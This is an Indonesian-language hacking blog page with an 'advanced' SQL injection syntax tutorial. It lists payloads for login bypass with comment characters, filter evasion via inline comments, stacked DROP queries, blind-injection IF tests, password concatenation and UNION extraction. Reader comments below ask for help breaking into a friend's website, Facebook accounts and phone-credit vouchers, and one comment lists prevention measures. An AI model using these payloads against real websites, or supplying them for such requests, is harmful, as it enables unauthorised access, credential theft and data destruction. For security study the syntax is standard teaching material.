Home / Tutorial / Simple SQL Injection Tutorial
black-hat-logo

Simple SQL Injection Tutorial

This information is for educational purpose only.
Please use this information wisely.

Udah pada tau kan soal SQL injection?
Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat)
Itu tutorial basic, sekarang kita ke tutorial advance.
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).

Oke, lets’ begin

Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#

Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan

2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist

+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya

3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–

4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’

+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)

5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist

Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist

6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.

Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel

Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel

– Enjoy –

About UtuH

Enjoy & Eat It!

Check Also

machine-learning-data-mining-binushacker

Machine Learning dan Data Mining

Greeting BinusHacker Family, Kali berbagi materi untuk machine learning basic untuk kebutuhan belajar mengembangkan ilmu …

33 comments

  1. makasih buad pencerahannya

    keep in touch

  2. makasi ilmunya om..

  3. I Love This Site…

  4. terima kasih banyak atas di muatnya tutor hack ini, coz dengan demikian kita bisa melawan tirani dimuka bumi ini, walau hanya lewat bawah tanah

  5. p4Ttr0Li_Cy83r

    makasih sql injectionya…bermanfaat bgt buat gw

  6. bagaiman cara protek mysql dari backdoor?
    tolong ya bantuannya,,sekalian contoh scriptnya,,

  7. gut…gut…semakin hebat nih>>>

  8. Yuuk langsung buat aplikasi pake java dunk

  9. yang bagian awalnya DL dimana ya ???
    thx be4…
    🙂

  10. gilaaaaaaaaaaaaaaaaaaaaaaaaaaaa pertama belajar SQL injection susah bgt….klo gwe butuh 2 minggu lebih ntuk mahamin semua nya tapi itu juga ga sema nya………….dan seneng bisa tau SQL injectio

  11. SQL injection, gampang2 susah………..

  12. bagaimana cara meng-hacke sql yang sudah dibuat dengan ekstensi lain (bulan *.sql, tetapi menjadi *.sdl). Trimakasih

  13. bagaimana cara meng-hacke sql yang sudah dibuat dengan ekstensi lain ( *.sql diubah menjadi *.sdl). Trimakasih

  14. ijin copas yah

  15. om mau tnya nie…

    aktifin sql injectnya dmna sie??..

    apakah mengunakn CMD? atau apa??..

    hlf om.. mu ngejail web temen nie yang sotoy…

  16. cara pencegahan bisa pakai ini :

    1. Batasi panjang input box (jika memungkinkan), dengan
    cara membatasinya di kode program, jadi si cracker pemula
    akan bingung sejenak melihat input box nya gak bisa di
    inject dengan perintah yang panjang.

    2. Filter input yang dimasukkan oleh user, terutama penggunaan
    tanda kutip tunggal (Input Validation).

    3. Matikan atau sembunyikan pesan-pesan error yang keluar
    dari SQL Server yang berjalan.

    4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
    Extended Stored Procedures jika memungkinkan.

    5. Ubah “Startup and run SQL Server” menggunakan low privilege user
    di SQL Server Security tab.

    selamat mencoba , mau yg lebih pasti , ya di enkripsi

  17. om ajari om aku bisa komputer tapi pengen ising2 belajar hack omm!!
    tolong perlengkapan yang harus aku sediakan ommm kalau pake program tolong ya om kirimi…thanks sekalian panduan nya ok!! makasih omm Ass wr wb

  18. om aq dak ngrti nih maklum bru prtama kali heheh
    tong dong om kirim ke email saya tutor nya yng lengkap mulai dari awal
    pencarian trgetnya sampai slesay makasih om hehehe

  19. gannnn <<<<<<baca

    bisa bantu aku ngk buka akun FB??
    SQL ne udah maintance kan??

    tolong pencerahanya ..

    d tunggu d e-mail ku iiaa

    critik dikit..
    mas ScrenShoot NA mANA JADI bINGUNG..

  20. sgl injection itu mudah, tapi pencarian targetnya yang sepertinya para admin sudah pada pinter

  21. maaf artikelna saya copas d blog saya,,, gpp kan????
    kan anak binus baek2…..

    jazakallah khairan katsira…

  22. ada yang tau softwaree hack fb gak?tpi jngan keylongger… bserta link download nya…

  23. om mau tnya nie…
    aktifin sql injectnya dmna sie??..
    apakah mengunakn CMD? atau apa??..
    baru mau belajar ne,send ke email y om..thxx

  24. Pas dengan yang saya cari

  25. Wah om saya petani cabe di bogor neh mau tanya sql injection apa yg mesti dipake utk dapetin nomor voucher untuk isi ulang pulsa xl saya neh, bs sms ke saya 087870675171 buat info itechnya dan skalian kirimin web link adresnya ok om dan bro teman? Thanks

  26. mkasiih bang…
    saran aje nii…
    lw post tutor advance ksih link basic juga doonk….

  27. belum pernah selesein 1 web site smpe pasword..

  28. share lagi yang lengkap ya. Sekalian tutor’nya.
    Haturnuhun.

  29. gak ngarti,,, ngarti nih meksipun bolak balik baca,,,,mau nanya juga bingung nanya apa….

  30. Terimkasih info nya saya wanita ingin belajar 😀

  31. pengen belaajr nih 😀

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *